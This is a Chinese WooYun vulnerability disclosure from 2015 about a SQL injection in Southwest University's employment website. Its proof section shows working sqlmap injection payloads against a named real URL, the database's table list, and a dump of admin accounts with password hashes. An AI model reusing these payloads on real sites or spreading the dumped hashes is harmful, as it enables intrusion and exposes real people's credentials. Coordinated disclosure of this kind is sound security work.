当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160003

漏洞标题:西南大学就业信息网漏洞#可泄漏大量学生信息

相关厂商:西南大学

漏洞作者: 路人甲

提交时间:2015-12-10 15:40

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-10: 厂商已经确认,细节仅向厂商公开
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

如题

详细说明:

1.漏洞说明:

西南大学就业信息网存在SQL注入漏洞,可泄露大量学生档案信息


2.漏洞位置:

就业信息网http://bkjyw.swu.edu.cn/


3.漏洞详细:

http://bkjyw.swu.edu.cn/index.php/article/index.html?uid=146


4.漏洞测试工具

sqlmap

漏洞证明:

5.漏洞证明:
漏洞识别信息:服务器:apache,数据库mysql,脚本php

---
Place: GET
Parameter: uid
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: uid=146) RLIKE (SELECT (CASE WHEN (3757=3757) THEN 146 ELSE 0x28 END)) AND (3848=3848
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: uid=146) AND (SELECT 6111 FROM(SELECT COUNT(*),CONCAT(0x716b736a71,(SELECT (CASE WHEN (6111=6111) THEN 1 ELSE 0 END)),0x716d797071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9502=9502
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: uid=146) AND 8862=BENCHMARK(5000000,MD5(0x79547777)) AND (4838=4838
---
[07:10:53] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.4.26
back-end DBMS: MySQL 5.0


数据库:

available databases [2]:
[*] information_schema
[*] swuzjc


数据表

Database: swuzjc
[19 tables]
+--------------------+
| jy_admin_user |
| jy_artcate |
| jy_article |
| jy_classes |
| jy_company_article |
| jy_downcate |
| jy_downfiles |
| jy_empcate |
| jy_employ |
| jy_flink |
| jy_news |
| jy_site_count |
| jy_user_company |
| jy_user_stu |
| jy_user_stu12 |
| jy_user_tech |
| jy_user_tech_bf |
| moo1n |
| sqlmapfile |
+--------------------+


很明显,有学生相关信息,对其中表jy_user_stu进行数据统计

Database: swuzjc
+-------------+---------+
| Table | Entries |
+-------------+---------+
| jy_user_stu | 14959 |
+-------------+---------+

有一万多条数据
对管理员表进行测试

Database: swuzjc
Table: jy_admin_user
[7 entries]
+----+------------+------+------+----------------------------------+-------+-------+-------+-------------+----------+---------+------------+
| id | identity | qq | role | pass | name | allow | email | mobile | company | classes | admin_code |
+----+------------+------+------+----------------------------------+-------+-------+-------+-------------+----------+---------+------------+
| 1 | <blank> | NULL | 1 | ba51a74d1c3a625e0f9fa2aeb924d0b1 | admin | 1 | NULL | 13700000000 | fafukeji | NULL | 0 |
| 9 | <blank> | NULL | 0 | d2bd2b5dc00e6391f5816faae3a65cd8 | 鍒樻枃骞 | 1 | NULL | <blank> | NULL | NULL | 104 |
| 21 | <blank> | NULL | 0 | 687701abd581a2ca28b4ccdbd210f4a1 | 鏂囩澘 | 1 | NULL | NULL | NULL | NULL | 333 |
| 22 | <blank> | NULL | 0 | 64d602cc9cbcfe5c6bc7e9a46b83af27 | 钂嬬伩 | 1 | NULL | NULL | NULL | NULL | 334 |
| 23 | <blank> | NULL | 0 | 62974a11acd4daa55648246b32fdd779 | 闄堣暰 | 1 | NULL | NULL | NULL | NULL | 335 |
| 26 | <blank> | NULL | 0 | 2869a7a33f1d4413a3eeedf0cbd25ac2 | 鍚戞湰绉 | 1 | NULL | NULL | NULL | NULL | 888 |
| 27 | <blank> | NULL | 0 | 250c5ef8cbfafb23596eb2cf530e163a | 鐢版尟鏁 | 1 | NULL | NULL | NULL | NULL | 666666 |
+----+------------+------+------+----------------------------------+-------+-------+-------+-------------+----------+---------+------------+


IFTACQ3)9ONUNEW9A~93MPC.png

9Z9D8O468MJRN}L7D960DJO.png


这里点到为止,不做过多深入,毕业季,望学校重视!

修复方案:

过滤相关关键词

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-10 15:59

厂商回复:

已转给相关单位处理,谢谢!

最新状态:

暂无


漏洞评价:

评价